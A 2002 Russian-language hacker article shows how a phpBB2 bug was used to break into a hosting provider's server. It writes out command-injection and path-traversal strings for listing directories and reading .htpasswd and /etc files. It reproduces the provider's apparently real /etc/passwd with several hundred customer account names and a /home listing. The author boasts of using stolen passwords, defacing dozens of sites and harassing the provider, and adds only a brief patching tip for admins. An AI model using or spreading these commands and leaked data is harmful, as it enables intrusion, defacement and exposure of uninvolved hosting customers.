[ Взлом интернет-хостинг-провайдера с использованием phpBB2 бага. ]
Date: 14.09.02
Доброго Вам времени суток.
В этой статье речь снова пойдет о том, как с помощью phpBB2 бага можно поиметь
хостинг-провайдера.
Информацию по использованию
данного бага можете прочитать в одноименной статье на нашем сайте в разделе TEXTS.
Информацию про этот баг на сегодняшний день можно найти на многих сайтах, посвященных
информационной безопасности, но суть не в этом. Многие люди, прочитав, как это все делается,
достают service.pwd с сайта и не знают, что с ним делать. Другие, более "умные",
догадываются открыть файл в текст-редакторе и замечают никс-like-пароль, о том, что
делать дальше они не знают. Именно об этом сегодня и пойдет речь.
Рутим phpBB2 баг на полную катушку.
Итак, воспользовавшись стандартной конструкцией, вида:
cmd=ls%20../../%20-al
cat%20../../.htpasswd
мы забираем пароль. А что если пароля там нет? Лезем дальше.
Конструкцией /../../../ передвигаемся по всему серверу. Особенно стоит посмотреть на верхних
уровнях. Там больше интересного. Вскоре мы замечаем, что находимся на диске компании,
которая предоставляет услуги хостинга. Что нам еще надо:-)
Конструкцией:
/../../../etc/
находим заветную папку - именно там и лежат файлы passwd или master.passwd.
-rw-r--r-- 1 root root 19787 Sep 12 19:18 passwd
Но как правило доступ к этим файлам
закрыт для нас через html-скрипт или содержит звезды вместо паролей (*). Для
более наглядной иллюстрации приведу пример, того, что содержалось на диске одного
провайдера, к которому я залез не так давно:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
pcap:x:77:77::/var/arpwatch:/bin/nologin
jason:x:500:500::/home/jason:/bin/bash
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
named:x:25:25:Named:/var/named:/bin/false
cpanel:x:32001:502::/home/cpanel:/bin/sh
mailman:x:32002:503::/home/mailman:/bin/sh
glassmav:x:32003:504::/home/glassmav:/bin/bash
squaredn:x:32004:505::/home/squaredn:/bin/bash
alpacawa:x:32006:507::/home/alpacawa:/bin/bash
chriswes:x:32007:508::/home/chriswes:/bin/bash
olakine:x:32008:509::/home/olakine:/bin/bash
colief:x:32009:510::/home/colief:/bin/bash
kfcullin:x:32011:512::/home/kfcullin:/bin/bash
abaconst:x:32013:514::/home/abaconst:/bin/bash
plastica:x:32014:515::/home/plastica:/bin/bash
projectx:x:32015:516::/home/projectx:/bin/bash
shopfor:x:32016:517::/home/shopfor:/bin/bash
jafdesig:x:32017:518::/home/jafdesig:/bin/bash
heartpar:x:32018:519::/home/heartpar:/bin/bash
almostfa:x:32019:520::/home/almostfa:/bin/bash
lostkoas:x:32020:521::/home/lostkoas:/bin/bash
totallyt:x:32022:523::/home/totallyt:/bin/bash
yoursws:x:32023:524::/home/yoursws:/bin/bash
amazed:x:32024:525::/home/amazed:/bin/bash
jbstrick:x:32025:526::/home/jbstrick:/bin/bash
ahndy:x:32026:527::/home/ahndy:/bin/bash
ub3rorg:x:32027:528::/home/ub3rorg:/bin/bash
ejimmie:x:32028:529::/home/ejimmie:/bin/bash
vitamin:x:32029:530::/home/vitamin:/bin/bash
static:x:32030:531::/home/static:/bin/bash
worshipt:x:32031:532::/home/worshipt:/bin/bash
anim3co:x:32033:534::/home/anim3co:/bin/bash
booksreb:x:32034:535::/home/booksreb:/bin/bash
catch77:x:32035:536::/home/catch77:/bin/bash
dbpartne:x:32036:537::/home/dbpartne:/bin/bash
zanyie:x:32038:539::/home/zanyie:/bin/bash
stinmed:x:32039:540::/home/stinmed:/bin/bash
triocons:x:32040:541::/home/triocons:/bin/bash
hombz:x:32041:542::/home/hombz:/bin/bash
mexicola:x:32042:543::/home/mexicola:/bin/bash
even-dee:x:32043:544::/home/even-dee:/bin/bash
cayosant:x:32044:545::/home/cayosant:/bin/bash
anonymou:x:32045:546::/home/anonymou:/bin/bash
ledscrip:x:32046:547::/home/ledscrip:/bin/bash
classicm:x:32047:548::/home/classicm:/bin/bash
bluecric:x:32048:549::/home/bluecric:/bin/bash
yoonorg:x:32049:550::/home/yoonorg:/bin/bash
mwebinc:x:32050:551::/home/mwebinc:/bin/bash
brash:x:32052:553::/home/brash:/bin/bash
whiffler:x:32054:555::/home/whiffler:/bin/bash
droogie:x:32055:556::/home/droogie:/bin/bash
seekknow:x:32056:557::/home/seekknow:/bin/bash
linkswor:x:32057:558::/home/linkswor:/bin/bash
anthonyb:x:32058:559::/home/anthonyb:/bin/bash
proton81:x:32060:561::/home/proton81:/bin/bash
cpradio:x:32061:562::/home/cpradio:/bin/false
idideco:x:32062:563::/home/idideco:/bin/bash
pfunk:x:32063:564::/home/pfunk:/bin/false
toujiplu:x:32064:565::/home/toujiplu:/bin/bash
allabout:x:32066:567::/home/allabout:/bin/bash
twisting:x:32068:569::/home/twisting:/bin/bash
theporks:x:32070:571::/home/theporks:/bin/bash
scriptit:x:32073:574::/home/scriptit:/bin/bash
unabashe:x:32074:575::/home/unabashe:/bin/bash
frogcity:x:32075:576::/home/frogcity:/bin/bash
spiffyj:x:32076:577::/home/spiffyj:/bin/bash
adamsatt:x:32077:578::/home/adamsatt:/bin/bash
funktrai:x:32078:579::/home/funktrai:/bin/bash
popdisas:x:32079:580::/home/popdisas:/bin/bash
vertical:x:32081:582::/home/vertical:/bin/bash
arnecc:x:32082:583::/home/arnecc:/bin/bash
telecip:x:32083:584::/home/telecip:/bin/bash
sestosan:x:32084:585::/home/sestosan:/bin/bash
alrawi:x:32085:586::/home/alrawi:/bin/bash
gluesenk:x:32087:588::/home/gluesenk:/bin/bash
smallcar:x:32088:589::/home/smallcar:/bin/bash
futurero:x:32090:591::/home/futurero:/bin/bash
camaleon:x:32091:592::/home/camaleon:/bin/bash
zenobay:x:32093:594::/home/zenobay:/bin/bash
mbjtech:x:32094:595::/home/mbjtech:/bin/bash
hurty:x:32095:596::/home/hurty:/bin/bash
amanda:x:32096:597::/home/amanda:/bin/bash
crimson:x:32097:598::/home/crimson:/bin/bash
jackshom:x:32098:599::/home/jackshom:/bin/bash
ithaca:x:32099:600::/home/ithaca:/bin/bash
sancrist:x:32100:601::/home/sancrist:/bin/bash
wbmc1931:x:32101:602::/home/wbmc1931:/bin/bash
robotlov:x:32102:603::/home/robotlov:/bin/bash
beenblun:x:32103:604::/home/beenblun:/bin/bash
interste:x:32104:605::/home/interste:/bin/bash
northern:x:32105:606::/home/northern:/bin/bash
bushbug:x:32106:607::/home/bushbug:/bin/bash
nauseous:x:32108:609::/home/nauseous:/bin/bash
soulwork:x:32109:610::/home/soulwork:/bin/bash
jenkinsb:x:32110:611::/home/jenkinsb:/bin/bash
gostek:x:32111:612::/home/gostek:/bin/bash
instant:x:32112:613::/home/instant:/bin/bash
higgysmi:x:32113:614::/home/higgysmi:/bin/bash
aural-6:x:32114:615::/home/aural-6:/bin/bash
mandalin:x:32116:617::/home/mandalin:/bin/bash
kevbot:x:32117:618::/home/kevbot:/bin/bash
spinelli:x:32118:619::/home/spinelli:/bin/bash
mkpenza:x:32119:620::/home/mkpenza:/bin/bash
itsessio:x:32120:621::/home/itsessio:/bin/bash
fixingyo:x:32121:622::/home/fixingyo:/bin/bash
approval:x:32122:623::/home/approval:/bin/bash
herbal:x:32123:624::/home/herbal:/bin/bash
vincentf:x:32125:626::/home/vincentf:/bin/bash
murioi:x:32126:627::/home/murioi:/bin/bash
webpages:x:32127:628::/home/webpages:/bin/bash
obelsor:x:32128:629::/home/obelsor:/bin/bash
sheepdog:x:32129:630::/home/sheepdog:/bin/bash
cbccross:x:32130:631::/home/cbccross:/bin/bash
stickyli:x:32131:632::/home/stickyli:/bin/bash
sqweeped:x:32132:633::/home/sqweeped:/bin/bash
thestarg:x:32133:634::/home/thestarg:/bin/bash
portersu:x:32134:635::/home/portersu:/bin/bash
lazybran:x:32135:636::/home/lazybran:/bin/bash
pconyour:x:32136:637::/home/pconyour:/bin/bash
dmafia:x:32137:638::/home/dmafia:/bin/bash
pickup:x:32138:639::/home/pickup:/bin/bash
metalfan:x:32139:640::/home/metalfan:/bin/bash
elimpex:x:32140:641::/home/elimpex:/bin/bash
richters:x:32141:642::/home/richters:/bin/bash
eatthelo:x:32142:643::/home/eatthelo:/bin/bash
oxygenad:x:32144:645::/home/oxygenad:/bin/bash
starrpet:x:32146:647::/home/starrpet:/bin/bash
code-tec:x:32147:648::/home/code-tec:/bin/bash
alistair:x:32148:649::/home/alistair:/bin/bash
vdarkn:x:32149:650::/home/vdarkn:/bin/bash
fiercest:x:32150:651::/home/fiercest:/bin/bash
jsnacks:x:32151:652::/home/jsnacks:/bin/bash
oopso:x:32153:654::/home/oopso:/bin/bash
nuviewc:x:32154:655::/home/nuviewc:/bin/bash
jjsmith:x:32155:656::/home/jjsmith:/bin/bash
inshad:x:32157:658::/home/inshad:/bin/bash
greeny:x:32158:659::/home/greeny:/bin/tcsh
eventsba:x:32159:660::/home/eventsba:/bin/bash
petrovs:x:32160:661::/home/petrovs:/bin/bash
gettoboy:x:32071:662::/home/gettoboy:/bin/bash
adlerco:x:32161:663::/home/adlerco:/bin/bash
aholmber:x:32162:664::/home/aholmber:/bin/bash
invisibl:x:32163:665::/home/invisibl:/bin/bash
plastikf:x:32164:666::/home/plastikf:/bin/bash
play1x2:x:32165:667::/home/play1x2:/bin/bash
rydaino:x:32166:668::/home/rydaino:/bin/bash
joelkimb:x:32167:669::/home/joelkimb:/bin/bash
impaxtc:x:32168:670::/home/impaxtc:/bin/bash
curvedvi:x:32169:671::/home/curvedvi:/bin/bash
cyberpan:x:32170:672::/home/cyberpan:/bin/bash
dreamswe:x:32172:674::/home/dreamswe:/bin/bash
charybdi:x:32174:676::/home/charybdi:/bin/bash
marketin:x:32175:677::/home/marketin:/bin/bash
hkinser:x:32176:678::/home/hkinser:/bin/bash
hansonhi:x:32177:679::/home/hansonhi:/bin/bash
perfumeo:x:32178:680::/home/perfumeo:/bin/bash
sugar-st:x:32179:681::/home/sugar-st:/bin/bash
blizzaga:x:32180:682::/home/blizzaga:/bin/bash
bombashi:x:32181:683::/home/bombashi:/bin/bash
dederdeb:x:32183:685::/home/dederdeb:/bin/bash
sandiesc:x:32184:686::/home/sandiesc:/bin/bash
ecomital:x:32185:687::/home/ecomital:/bin/bash
wherethe:x:32186:688::/home/wherethe:/bin/bash
modernar:x:32187:689::/home/modernar:/bin/bash
wetzell:x:32188:690::/home/wetzell:/bin/bash
hushedn:x:32189:691::/home/hushedn:/bin/bash
nealtec:x:32191:693::/home/nealtec:/bin/bash
hydrotec:x:32193:695::/home/hydrotec:/bin/bash
hprimage:x:32194:696::/home/hprimage:/bin/bash
notanoth:x:32196:698::/home/notanoth:/bin/bash
iglenet:x:32197:699::/home/iglenet:/bin/bash
bpcacom:x:32198:700::/home/bpcacom:/bin/bash
michael:x:32199:701::/home/michael:/bin/bash
grathio:x:32200:702::/home/grathio:/bin/bash
happie:x:32201:703::/home/happie:/bin/bash
liggitt:x:32202:704::/home/liggitt:/bin/bash
classica:x:32203:705::/home/classica:/bin/bash
gregorio:x:32204:706::/home/gregorio:/bin/bash
railsour:x:32205:707::/home/railsour:/bin/bash
dvbsrule:x:32206:708::/home/dvbsrule:/bin/bash
churchil:x:32207:709::/home/churchil:/bin/bash
azhigher:x:32208:710::/home/azhigher:/bin/bash
kelleyto:x:32209:711::/home/kelleyto:/bin/bash
joshuabe:x:32210:712::/home/joshuabe:/bin/bash
tillman:x:32211:713::/home/tillman:/bin/bash
hispason:x:32213:715::/home/hispason:/bin/bash
layzee:x:32214:716::/home/layzee:/bin/bash
bodgadle:x:32215:717::/home/bodgadle:/bin/bash
kurtzele:x:32217:719::/home/kurtzele:/bin/bash
exposur3:x:32218:720::/home/exposur3:/bin/bash
elektrix:x:32219:721::/home/elektrix:/bin/bash
ants4pet:x:32220:722::/home/ants4pet:/bin/bash
pizzazac:x:32221:723::/home/pizzazac:/bin/bash
kiersted:x:32222:724::/home/kiersted:/bin/bash
mroresou:x:32223:725::/home/mroresou:/bin/bash
kaixmedi:x:32224:726::/home/kaixmedi:/bin/bash
primitiv:x:32225:727::/home/primitiv:/bin/bash
emohnet:x:32226:728::/home/emohnet:/bin/bash
rainmake:x:32227:729::/home/rainmake:/bin/bash
redbullv:x:32228:730::/home/redbullv:/bin/bash
globalaf:x:32229:731::/home/globalaf:/bin/bash
sixpsnet:x:32173:732::/home/sixpsnet:/bin/bash
genuinem:x:32231:733::/home/genuinem:/bin/bash
verdigri:x:32232:734::/home/verdigri:/bin/bash
theforem:x:32233:735::/home/theforem:/bin/bash
m-forcer:x:32234:736::/home/m-forcer:/bin/bash
quorumco:x:32235:737::/home/quorumco:/bin/bash
dyunks:x:32236:738::/home/dyunks:/bin/bash
hq-dvdc:x:32237:739::/home/hq-dvdc:/bin/bash
menlo-oa:x:32239:741::/home/menlo-oa:/bin/bash
lingcrea:x:32240:742::/home/lingcrea:/bin/bash
ramseurh:x:32241:743::/home/ramseurh:/bin/bash
cjcjente:x:32242:744::/home/cjcjente:/bin/bash
scheme23:x:32244:746::/home/scheme23:/bin/bash
waverace:x:32246:748::/home/waverace:/bin/bash
psychics:x:32248:750::/home/psychics:/bin/bash
cyberhob:x:32249:751::/home/cyberhob:/bin/bash
fantabul:x:32250:752::/home/fantabul:/bin/bash
ne12c:x:32251:753::/home/ne12c:/bin/bash
preslyni:x:32252:754::/home/preslyni:/bin/bash
wildrose:x:32253:755::/home/wildrose:/bin/bash
calacho2:x:32254:756::/home/calacho2:/bin/bash
accwa:x:32152:757::/home/accwa:/bin/bash
mjimm:x:32255:758::/home/mjimm:/bin/bash
ngoro:x:32256:759::/home/ngoro:/bin/bash
soliloqu:x:32258:761::/home/soliloqu:/bin/bash
harmonwo:x:32259:762::/home/harmonwo:/bin/bash
laudansk:x:32260:763::/home/laudansk:/bin/bash
htmlhelp:x:32262:765::/home/htmlhelp:/bin/bash
gameseka:x:32145:646::/home/gameseka:/bin/bash
newstrol:x:32265:768::/home/newstrol:/bin/bash
ebipmne:x:32266:770::/home/ebipmne:/bin/bash
weatherf:x:32267:771::/home/weatherf:/bin/bash
inbinet:x:32268:772::/home/inbinet:/bin/bash
andrewle:x:32269:773::/home/andrewle:/bin/bash
whudatc:x:32271:775::/home/whudatc:/bin/bash
stmirren:x:32272:776::/home/stmirren:/bin/bash
voetafdr:x:32273:777::/home/voetafdr:/bin/bash
baddmoma:x:32274:778::/home/baddmoma:/bin/bash
rcompany:x:32275:779::/home/rcompany:/bin/bash
movistar:x:32277:781::/home/movistar:/bin/bash
stevenv:x:32278:782::/home/stevenv:/bin/bash
twotoned:x:32279:783::/home/twotoned:/bin/bash
e-fatti:x:32280:784::/home/e-fatti:/bin/bash
wannadie:x:32282:786::/home/wannadie:/bin/false
pixelfus:x:32283:787::/home/pixelfus:/bin/bash
stevenha:x:32284:788::/home/stevenha:/bin/bash
lilacspr:x:32285:789::/home/lilacspr:/bin/bash
dsoftco:x:32286:790::/home/dsoftco:/bin/bash
susanorl:x:32287:791::/home/susanorl:/bin/bash
five30c:x:32288:792::/home/five30c:/bin/bash
internet:x:32289:793::/home/internet:/bin/bash
maarefne:x:32290:794::/home/maarefne:/bin/bash
rouxnet:x:32291:795::/home/rouxnet:/bin/bash
relaxnet:x:32294:798::/home/relaxnet:/bin/bash
figmane:x:32295:799::/home/figmane:/bin/bash
oopsy-da:x:32296:800::/home/oopsy-da:/bin/bash
tecteon:x:32297:801::/home/tecteon:/bin/bash
lilywebd:x:32298:802::/home/lilywebd:/bin/bash
showco:x:32300:804::/home/showco:/bin/bash
cmswebo:x:32301:805::/home/cmswebo:/bin/bash
tormansf:x:32302:806::/home/tormansf:/bin/bash
pineland:x:32303:807::/home/pineland:/bin/bash
wfcstude:x:32304:808::/home/wfcstude:/bin/bash
cae-ico:x:32305:809::/home/cae-ico:/bin/bash
wytchede:x:32307:811::/home/wytchede:/bin/bash
sega-bra:x:32308:812::/home/sega-bra:/bin/bash
agnplace:x:32309:813::/home/agnplace:/bin/bash
dickensf:x:32310:814::/home/dickensf:/bin/bash
elerrina:x:32312:816::/home/elerrina:/bin/bash
openglfo:x:32314:818::/home/openglfo:/bin/bash
burkelan:x:32315:819::/home/burkelan:/bin/bash
russian:x:32316:820::/home/russian:/bin/bash
taskmind:x:32317:821::/home/taskmind:/bin/bash
skiphayn:x:32319:823::/home/skiphayn:/bin/bash
katania:x:32321:825::/home/katania:/bin/bash
thumbwor:x:32322:826::/home/thumbwor:/bin/bash
hallsofa:x:32323:827::/home/hallsofa:/bin/bash
buckeyep:x:32324:828::/home/buckeyep:/bin/bash
adelante:x:32325:829::/home/adelante:/bin/bash
parisfor:x:32326:830::/home/parisfor:/bin/bash
malibubo:x:32331:835::/home/malibubo:/bin/bash
readeraw:x:32332:836::/home/readeraw:/bin/false
imagepla:x:32333:837::/home/imagepla:/bin/bash
cityofgh:x:32334:838::/home/cityofgh:/bin/bash
webopium:x:32335:839::/home/webopium:/bin/bash
searchwi:x:32336:840::/home/searchwi:/bin/bash
womeninp:x:32338:842::/home/womeninp:/bin/bash
llerandi:x:32339:843::/home/llerandi:/bin/bash
nothingo:x:32340:844::/home/nothingo:/bin/bash
ericstum:x:32341:845::/home/ericstum:/bin/bash
thwipco:x:32342:846::/home/thwipco:/bin/bash
happy-pi:x:32343:847::/home/happy-pi:/bin/bash
janachar:x:32344:848::/home/janachar:/bin/bash
leaninto:x:32345:849::/home/leaninto:/bin/bash
dlfgolfr:x:32346:850::/home/dlfgolfr:/bin/bash
grace-st:x:32347:851::/home/grace-st:/bin/bash
imcassoc:x:32349:853::/home/imcassoc:/bin/bash
richpaul:x:32350:854::/home/richpaul:/bin/bash
worldcar:x:32351:855::/home/worldcar:/bin/bash
cyprusfx:x:32352:856::/home/cyprusfx:/bin/bash
visit4in:x:32353:857::/home/visit4in:/bin/bash
tessitor:x:32354:858::/home/tessitor:/bin/bash
creative:x:32355:859::/home/creative:/bin/bash
ardesco:x:32357:861::/home/ardesco:/bin/bash
kissther:x:32358:862::/home/kissther:/bin/bash
jeffbuck:x:32360:864::/home/jeffbuck:/bin/bash
cayduac:x:32361:865::/home/cayduac:/bin/bash
dickswiz:x:32363:867::/home/dickswiz:/bin/bash
noidaaut:x:32364:868::/home/noidaaut:/bin/bash
marengof:x:32365:869::/home/marengof:/bin/bash
dbcmosc:x:32366:870::/home/dbcmosc:/bin/bash
syghtne:x:32367:871::/home/syghtne:/bin/bash
measeper:x:32368:872::/home/measeper:/bin/bash
redbusco:x:32369:873::/home/redbusco:/bin/bash
rocketpr:x:32370:874::/home/rocketpr:/bin/bash
towsonpu:x:32372:876::/home/towsonpu:/bin/bash
daneweng:x:32373:877::/home/daneweng:/bin/bash
kojaloc:x:32374:878::/home/kojaloc:/bin/bash
limitedh:x:32377:881::/home/limitedh:/bin/bash
nineseve:x:32378:882::/home/nineseve:/bin/bash
vateuber:x:32381:886::/home/vateuber:/bin/bash
nzapertu:x:32384:889::/home/nzapertu:/bin/bash
planetar:x:32385:890::/home/planetar:/bin/bash
gammerst:x:32386:891::/home/gammerst:/bin/bash
thesmith:x:32328:892::/home/thesmith:/bin/bash
bursting:x:32195:824::/home/bursting:/bin/bash
daisey:x:32348:897::/home/daisey:/bin/bash
sublimed:x:32356:898::/home/sublimed:/bin/bash
testdom:x:32115:616::/home/testdom:/bin/bash
afcrewn:x:32263:880::/home/afcrewn:/bin/bash
greenage:x:32276:780::/home/greenage:/bin/bash
aletiaba:x:32005:896::/home/aletiaba:/bin/bash
vbds:x:32072:899::/home/vbds:/bin/bash
gdsdiese:x:32080:900::/home/gdsdiese:/bin/bash
orbjapan:x:32089:901::/home/orbjapan:/bin/bash
alanewsc:x:32107:902::/home/alanewsc:/bin/bash
bioray20:x:32182:903::/home/bioray20:/bin/bash
nautical:x:32238:904::/home/nautical:/bin/bash
smallhot:x:32306:906::/home/smallhot:/bin/bash
nobs-thu:x:32313:907::/home/nobs-thu:/bin/bash
curtis1c:x:32327:909::/home/curtis1c:/bin/bash
semwebco:x:32330:910::/home/semwebco:/bin/bash
verelstb:x:32359:911::/home/verelstb:/bin/bash
mosaicvo:x:32376:914::/home/mosaicvo:/bin/bash
peterose:x:32379:915::/home/peterose:/bin/bash
isotope3:x:32380:916::/home/isotope3:/bin/bash
schoolho:x:32383:917::/home/schoolho:/bin/bash
long-ter:x:32387:918::/home/long-ter:/bin/bash
snushed:x:32156:832::/home/snushed:/bin/bash
eebuild:x:32053:774::/home/eebuild:/bin/bash
mycity:x:32190:866::/home/mycity:/bin/bash
hardboil:x:32247:912::/home/hardboil:/bin/bash
jalangus:x:32257:919::/home/jalangus:/bin/bash
mffitzge:x:32264:920::/home/mffitzge:/bin/bash
brucemyr:x:32270:921::/home/brucemyr:/bin/bash
music-bu:x:32010:513::/home/music-bu:/bin/bash
tampapar:x:32012:587::/home/tampapar:/bin/bash
indecizi:x:32037:769::/home/indecizi:/bin/bash
realart4:x:32065:841::/home/realart4:/bin/bash
catluvne:x:32092:922::/home/catluvne:/bin/bash
pletaqzo:x:32124:923::/home/pletaqzo:/bin/bash
free-for:x:32212:924::/home/free-for:/bin/bash
awesome-:x:32261:926::/home/awesome-:/bin/bash
chrisosg:x:32281:927::/home/chrisosg:/bin/bash
bobbphot:x:32292:928::/home/bobbphot:/bin/bash
hirobumi:x:32293:929::/home/hirobumi:/bin/bash
myunixzc:x:32311:930::/home/myunixzc:/bin/bash
nervepla:x:32069:913::/home/nervepla:/bin/bash
presence:x:32318:931::/home/presence:/bin/bash
nevinsco:x:32067:932::/home/nevinsco:/bin/bash
cherryho:x:32143:933::/home/cherryho:/bin/bash
sibermau:x:32059:925::/home/sibermau:/bin/bash
odonnell:x:32216:935::/home/odonnell:/bin/bash
green-wo:x:32299:936::/home/green-wo:/bin/bash
domecont:x:32320:937::/home/domecont:/bin/bash
swtphide:x:32329:938::/home/swtphide:/bin/bash
repairla:x:32171:833::/home/repairla:/bin/bash
silentsc:x:32021:939::/home/silentsc:/bin/bash
yukizora:x:32337:940::/home/yukizora:/bin/bash
edwardsh:x:32362:941::/home/edwardsh:/bin/bash
utilitya:x:32371:942::/home/utilitya:/bin/bash
jediknig:x:32375:943::/home/jediknig:/bin/bash
inches-t:x:32388:944::/home/inches-t:/bin/bash
jhooverc:x:32389:945::/home/jhooverc:/bin/false
betaonli:x:32390:946::/home/betaonli:/bin/bash
eservice:x:32391:947::/home/eservice:/bin/bash
movilnue:x:32392:948::/home/movilnue:/bin/bash
a1promot:x:32393:949::/home/a1promot:/bin/bash
sleeqcom:x:32395:951::/home/sleeqcom:/bin/bash
cyberick:x:32051:887::/home/cyberick:/bin/bash
anneliza:x:32192:934::/home/anneliza:/bin/bash
supportp:x:32032:950::/home/supportp:/bin/bash
softcoup:x:32086:952::/home/softcoup:/bin/bash
medproin:x:32230:694::/home/medproin:/bin/bash
junquera:x:32243:953::/home/junquera:/bin/bash
Нравится список?
Это не что иное, как список логинов всех аккаунтов у хостинг провайдера.
Настроение поднимается и мы идем дальше. В наших руках оказывается содержимое
всех интернет-ресурсов данного провайдера. Чувствуете власть в своих руках?
Далее выходим из директории etc и заходим в диру самих сайтов.
У этого прова домом для сайтов служила дира /home/. Приведу пример
все с того же прова:
drwxr-xr-x 409 root root 8192 Aug 31 06:36 .
drwxr-xr-x 23 root root 4096 Aug 27 23:29 ..
drwx--x--x 9 a1promot a1promot 4096 Sep 12 23:17 a1promot
drwx--x--x 11 abaconst abaconst 4096 Feb 16 2002 abaconst
drwx--x--x 10 accwa accwa 4096 Aug 12 21:31 accwa
drwxr-xr-x 5 root root 4096 Jul 7 20:24 acidrain
drwx--x--x 15 adamsatt adamsatt 4096 Sep 1 20:54 adamsatt
drwx--x--x 12 adelante adelante 4096 Jun 3 19:51 adelante
drwx--x--x 7 adlerco adlerco 4096 Sep 10 15:51 adlerco
drwx--x--x 14 afcrewn afcrewn 4096 Jul 6 10:46 afcrewn
drwx--x--x 26 agnplace agnplace 8192 Sep 8 18:42 agnplace
drwx--x--x 19 ahndy ahndy 4096 Sep 10 01:02 ahndy
drwx--x--x 10 aholmber aholmber 4096 Apr 21 12:49 aholmber
drwx--x--x 12 alanewsc alanewsc 4096 Aug 6 23:15 alanewsc
drwx--x--x 7 aletiaba aletiaba 4096 Sep 10 15:52 aletiaba
drwx--x--x 23 alistair alistair 4096 Sep 10 17:19 alistair
...
...
...
Здесь мы видим все сайты, инфа которых для нас открыта.
Видно, кто имеет доступ к сайту - рут или аккаунт-юзверь.
Теперь мы можем вывести листинг содержимого любого сайта, а их здесь очень много
(смотри количество аккаунтов). Залезть практически на любую скрытую от глаз
обычных посетителей сайта страницу. Посмотреть исходники скриптов,
где наверняка найдутся ошибки. Удобно тренироваться во взломе, когда имеешь
доступ изнутри и снаружи.
Я, к примеру, облазил весь диск провайдера, все директории держателей аккаунтов у этого
прова и нашел для себя кучу интересного:
~ пароли от приват зон, зон для мембров, которыми сразу же воспользовался для удовлетворения
своего любопытства, а то иш тут наставили...
~ пароли от гостевых книг
~ пароли от нескольких форумов, правда совсем не отличающихся красотой и новизной версий
~ кучу паролей от FrontPage'а, что дало мне "право" задефейсить несколько десятков сайтов
~ исходники скриптов
~ кроме того я вникнул во всю внутреннюю структуру, что было не менее важно,
чем все вышеупомянутое.
Я лазил по их диску много часов несколько дней подряд. На последок подефейсил несколько
сайтов на выбор и закинул все это. Позднее решил отразить все, что я делал в этой статье.
Заключение
Для хакеров:
Не бросайтесь сразу дефейсить, настоящая ценность в информации. Зачем
дефейсить сайт через стандартный скрипт, если можно, изучив систему, нагнуть
целого хостинг-провайдера, после чего слать ему письма каждый день от анонима с
листингами директорий его сервера. Вот это забава! Поверьте мне!
Для админов:
Я бы проверил директории всех аккаунт-юзверей, которые у вас хостятся
на наличие непропатченного форума phpBB2, и, если такие найдутся, а они, я думаю,
обязательно найдутся, срочно заставить их пропатчить форум или просто его удалить.
В противном случае вам надоест читать письма ваших клиентов о том, что их сайт
опять взломали. Потому как по сути дела, можно получить доступ практически к любому
провайдеру, купив у него хостинг с MySQL, и, установив туда phpBB2 форум, залезть на его диск
со всеми вытекающими отсюда последствиями.
Кроме того клиентская база данных сама по себе представляет
ценнейшую информацию. Я не по наслышке знаю что это такое (работал в банке).
В руках конкурентов это прекрасное средство борьбы.
Вот пример, получив аккаунт список можно полазить по сайтам, составить
мейл-лист и предложить им свои услуги, которые реально дешевле стоят. И, поверьте, люди
уйдут от вас к другому провайдеру и Вы банкрот, и все придется начинать сначала.
Кроме того, данный баг является прекрасным оружием получения новых клиентов для больших
хостинг провайдеров, типа mtu или masterhost, на которых хостится огромное число сайтов.
За счет больших оборотов, себестоимость снижается и цена за хостинг падает с
улучшением качаства предоставляемых услуг. Теперь представьте, что вы маленький
хостинг-провайдер с базой в 100 аккаунтов и ваша база становится известной другим.
Результат, понятно, плачевный.
{dr}{NerVe} [KODSWEB]
!!! Статья является собственностью команды KODSWEB !!!
!!! Любое распространение без нашего разрешения строго запрешено !!!
|
